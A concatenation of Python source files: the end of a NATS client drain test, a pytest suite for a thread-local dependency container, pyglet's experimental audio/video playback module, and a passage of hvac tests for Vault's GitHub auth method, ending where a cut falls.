yield nc2.publish_request("foo", "my-replies.AAA", b'help')
yield nc2.publish_request("bar", "my-replies.BBB", b'help')
yield nc2.publish_request("quux", "my-replies.CCC", b'help')
# Relinquish control so that messages are processed.
yield tornado.gen.sleep(0)
yield nc2.flush()
# Drain and close the connection. In case of timeout then
# an async error will be emitted via the error callback.
yield nc.drain()
self.assertTrue(type(errors[0]) is ErrDrainTimeout)
# No need to close first connection since drain reaches
# the closed state.
yield nc2.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
self.assertTrue(nc2.is_closed)
self.assertFalse(nc2.is_connected)
if __name__ == '__main__':
runner = unittest.TextTestRunner(stream=sys.stdout)
unittest.main(verbosity=2, exit=False, testRunner=runner)
|
test_006_threadlocal_simple_container.py
|
#!/bin/false
# Copyright (c) 2022 Vít Labuda. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import os.path
if "SIDEIN_TESTS_AUTOPATH" in os.environ:
__TESTS_DIR = os.path.dirname(os.path.realpath(__file__))
__MODULE_DIR = os.path.realpath(os.path.join(__TESTS_DIR, ".."))
if __TESTS_DIR not in sys.path:
sys.path.insert(0, __TESTS_DIR)
if __MODULE_DIR not in sys.path:
sys.path.insert(0, __MODULE_DIR)
from typing import List
import pytest
import threading
from sidein.Sidein import Sidein
from sidein.providers.simplecontainer.ThreadLocalSimpleContainer import ThreadLocalSimpleContainer
dependency_names = (
"",
" ",
"\r\n",
"com.example.container_dependency",
"container dependency with spaces",
"řeřicha",
"Příliš žluťoučký kůň úpěl ďábelské ódy.",
"Příliš žluťoučký kůň úpěl ďábelské ódy. ",
"Příliš žluťoučký kůň úpěl ďábelské ódy.\n",
"🤍🤎",
"🕐🕑🕒🕓",
)
def make_dummy_dep(dep_name: str) -> str:
return dep_name + " dependency value"
@pytest.fixture
def container():
ns_name = __file__
ns_ = Sidein.ns(ns_name)
ns_.set_dependency_provider(ThreadLocalSimpleContainer())
yield ns_.get_dependency_provider()
Sidein.get_namespace_manager().remove_namespace(ns_name)
# As of now, the implementation of thread-local simple container differs from the global simple container only in the
# dependency storage (thread-local vs. global). As global simple container is tested too, the only thing that's tested
# here is that the thread-local storage is really thread-local.
def test_dependency_storage_thread_locality(container):
def _count_dependencies(save_count_here: List[int]) -> None:
save_count_here.append(len(container.get_all_dependencies()))
for dep_name in dependency_names:
container.add_dependency(dep_name, make_dummy_dep(dep_name))
main_dep_count, thread_dep_count = [], []
_count_dependencies(main_dep_count)
t = threading.Thread(target=_count_dependencies, args=(thread_dep_count,))
t.start()
t.join()
assert isinstance(main_dep_count[0], int)
assert isinstance(thread_dep_count[0], int)
assert main_dep_count[0] == len(dependency_names)
assert thread_dep_count[0] == 0
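# Illustrative sketch (not part of the original suite): the thread-locality
# asserted above mirrors plain threading.local() behaviour -- an attribute set
# in the main thread is simply absent when the same object is inspected from
# another thread. The helper reuses the module-level `threading` import and is
# underscore-prefixed so pytest does not collect it.
def _threading_local_reference_behaviour() -> None:
    store = threading.local()
    store.value = "only visible in the thread that set it"
    seen_in_other_thread = []
    def _reader() -> None:
        # A fresh thread sees no `value` attribute on the same local() object.
        seen_in_other_thread.append(hasattr(store, "value"))
    t = threading.Thread(target=_reader)
    t.start()
    t.join()
    assert seen_in_other_thread == [False]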
|
mt_media.py
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id: $
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class implements the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: __init__.py 2005 2008-04-13 01:03:03Z Alex.Holkner $'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import StringIO
import pyglet
_debug = pyglet.options['debug_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
        The `stopped` instance variable is set to ``True`` and the condition is
        notified. It is the responsibility of the `run` method to check
        the value of `stopped` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
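# Illustrative sketch (not part of the original module): WorkerThread is a
# minimal job queue -- start it once, feed it zero-argument callables with
# put_job(), and call stop() when finished; stop() wakes the blocked get_job()
# call so run() can exit, then joins the thread. Defined here but never called.
def _example_worker_thread_usage():
    worker = WorkerThread()
    worker.start()
    worker.put_job(lambda: None)   # any zero-argument callable
    worker.stop()                  # wakes get_job(), lets run() return, joins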
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
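# Illustrative example (not part of the original module): 16-bit stereo audio
# at 44100 Hz gives bytes_per_sample = (16 >> 3) * 2 = 4 and
# bytes_per_second = 4 * 44100 = 176400.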
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
class AudioData(object):
'''A single packet of audio data.
This class is used internally by pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
            # faster than fudging around with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
def get_string_data(self):
'''Return data as a string.'''
if type(self.data) is str:
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
        # Meaning of timestamp is dependent on context, and is not seen by
        # the application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
pyglet.app.event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
'''
_duration = None
audio_format = None
video_format = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a ManagedSoundPlayer for
this source and plays it immediately.
:rtype: `ManagedSoundPlayer`
'''
player = ManagedSoundPlayer()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
# Create a dummy player for the source to push its textures onto.
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
assert image is not None
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if there are no more
video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def _seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
            raise NotImplementedError(
                'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = StringIO.StringIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = StringIO.StringIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def _seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
        return AudioData(data, len(data), timestamp, duration, [])
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0]._seek(time)
def queue(self, source):
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._sources.pop(0)
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0]._get_audio_data(bytes) # TODO method rename
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._sources[0]._seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0]._get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
            # Timestamp is from a dequeued source... need to keep track of
# these.
raise NotImplementedError('TODO')
return timestamp
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_texture = None
_video_frame_id = -1
_video_frame_dirty = False
_video_frame_required = True
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
if not self._audio_player:
self._create_audio_player()
def play(self):
if self._audio_player:
self._audio_player.play()
self._playing = True
def pause(self):
if self._audio_player:
time = self._audio_player.get_time()
if time is not None:
self._paused_time = time
self._audio_player.stop()
self._playing = False
def next(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next()
return
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._create_audio_player()
return
self._playing = False
self.dispatch_event('on_player_eos')
def seek(self, time):
self._audio_player.clear()
self._video_frame_dirty = True
self._paused_time = time
self.source.seek(time)
if self.source.video_format:
self._video_frame_required = True
self._video_frame_dirty = True
self._video_frame_id = self.source.get_next_video_frame_id()
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
else:
self._audio_player = create_silent_audio_player(group, self)
# TODO video texture create here.
if self._playing:
self._audio_player.play()
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def get_texture(self):
if not self.source:
return
if _debug:
print 'get_texture', self._video_frame_dirty
# TODO recreate texture
video_format = self.source.video_format
if video_format:
if not self._texture:
if _debug:
print 'create texture'
self._texture = pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
if self._video_frame_dirty:
self.update_texture()
return self._texture
def update_texture(self):
if _debug:
print 'update_texture', self._video_frame_id
image = self.source.get_video_frame(self._video_frame_id)
self._video_frame_dirty = False
if image:
# TODO avoid get_texture
if _debug:
print 'blit_into'
self.get_texture().blit_into(image, 0, 0, 0)
if _debug:
print 'update_texture -> void (dirty = %r)' % self._video_frame_dirty, self
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
def on_video_frame(self, id):
if _debug:
print 'Player.on_video_frame', id
if self._video_frame_dirty:
print 'Skipping frame', self._video_frame_id
self._video_frame_id = id
self._video_frame_dirty = True
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
Player.register_event_type('on_video_frame')
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import mt_avbin
return mt_avbin.AVbinSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
`streaming` : bool
If False, a `StaticSource` will be returned; otherwise (default) a
`StreamingSource` is created.
:rtype: `Source`
'''
source = get_source_loader().load(filename, file)
if not streaming:
source = StaticSource(source)
return source
def create_silent_audio_player(source_group, player):
    raise NotImplementedError('TODO')
def get_audio_driver():
global _audio_driver
if _audio_driver:
return _audio_driver
_audio_driver = None
# TODO options
#driver_names = ('silent',)
#driver_names = ('directsound',) # 'pulse', 'openal')
#driver_names = ('openal',)
driver_names = ('pulse',)
for driver_name in driver_names:
try:
if driver_name == 'pulse':
from drivers import pulse
_audio_driver = pulse.create_audio_driver()
break
elif driver_name == 'openal':
from drivers import openal
_audio_driver = openal.create_audio_driver()
break
            elif driver_name == 'directsound':
                from drivers import directsound
                _audio_driver = directsound.create_audio_driver()
                break
elif driver_name == 'silent':
from drivers import silent
_audio_driver = silent.create_audio_driver()
break
        except Exception:
            if _debug:
                print 'Error importing driver %s' % driver_name
return _audio_driver
_audio_driver = None
def get_source_loader():
global _source_loader
if _source_loader:
return _source_loader
try:
import mt_avbin
_source_loader = AVbinSourceLoader()
except ImportError:
raise NotImplementedError('TODO: RIFFSourceLoader')
return _source_loader
_source_loader = None
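# Illustrative usage of the classes above (a rough sketch, not part of the
# module): the media file name is an example, and a real application would
# still need an event loop (e.g. pyglet.app.run()) to drive playback and
# video frame updates.
if __name__ == '__main__':
    source = load('example.mp4', streaming=True)
    player = Player()
    player.queue(source)
    player.play()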
|
test_github.py
|
from threading import Thread
from unittest import TestCase
from parameterized import parameterized
from hvac import exceptions
from tests import utils
from tests.utils.hvac_integration_test_case import HvacIntegrationTestCase
from tests.utils.mock_github_request_handler import MockGithubRequestHandler
try:
    # Python 3.x
    from http.server import HTTPServer
except ImportError:
    # Python 2.7
    from BaseHTTPServer import HTTPServer
class TestGithub(HvacIntegrationTestCase, TestCase):
TEST_GITHUB_PATH = 'test-github'
@classmethod
def setUpClass(cls):
try:
super(TestGithub, cls).setUpClass()
# Configure mock server.
cls.mock_server_port = utils.get_free_port()
cls.mock_server = HTTPServer(('localhost', cls.mock_server_port), MockGithubRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
except Exception:
# Ensure that Vault server is taken down if setUpClass fails
super(TestGithub, cls).tearDownClass()
raise
def setUp(self):
super(TestGithub, self).setUp()
self.client.sys.enable_auth_method(
method_type='github',
path=self.TEST_GITHUB_PATH,
)
def tearDown(self):
super(TestGithub, self).tearDown()
self.client.sys.disable_auth_method(
path=self.TEST_GITHUB_PATH,
)
@parameterized.expand([
("just organization", 204, 'some-test-org', '', 0, 0, TEST_GITHUB_PATH),
])
def test_configure(self, test_label, expected_status_code, organization, base_url, ttl, max_ttl, mount_point):
response = self.client.auth.github.configure(
organization=organization,
base_url=base_url,
ttl=ttl,
max_ttl=max_ttl,
mount_point=mount_point,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_configuration(self):
response = self.client.auth.github.read_configuration(
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("just organization", 'some-test-org', '', '', ''),
("different base url", 'some-test-org', 'https://cathub.example', '', ''),
("custom ttl seconds", 'some-test-org', '', '500s', ''),
("custom ttl minutes", 'some-test-org', '', '500m', ''),
("custom ttl hours", 'some-test-org', '', '500h', ''),
("custom max ttl", 'some-test-org', '', '', '500s'),
])
def test_configure_and_read_configuration(self, test_label, organization, base_url, ttl, max_ttl):
config_response = self.client.auth.github.configure(
organization=organization,
base_url=base_url,
ttl=ttl,
max_ttl=max_ttl,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=204,
second=config_response.status_code
)
read_config_response = self.client.auth.github.read_configuration(
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=organization,
second=read_config_response['data']['organization']
)
self.assertEqual(
first=base_url,
second=read_config_response['data']['base_url']
)
self.assertEqual(
first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=ttl),
second=read_config_response['data']['ttl']
)
self.assertEqual(
first=self.convert_python_ttl_value_to_expected_vault_response(ttl_value=max_ttl),
second=read_config_response['data']['max_ttl']
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policies", 204, 'hvac', ['default']),
])
def test_map_team(self, test_label, expected_status_code, team_name, policies):
response = self.client.auth.github.map_team(
team_name=team_name,
policies=policies,
mount_point=self.TEST_GITHUB_PATH,
)
self.assertEqual(
first=expected_status_code,
second=response.status_code
)
def test_read_team_mapping(self):
response = self.client.auth.github.read_team_mapping(
team_name='hvac',
mount_point=self.TEST_GITHUB_PATH,
)
self.assertIn(
member='data',
container=response,
)
@parameterized.expand([
("no policies", 204, 'hvac', None),
("with policy", 204, 'hvac', ['default']),
("with policy incorrect type", 204, 'hvac', 'default, root', exceptions.ParamValidationError, "unsupported policies argument provided"),
("with policies", 204, 'hvac', ['default', 'root']),
])
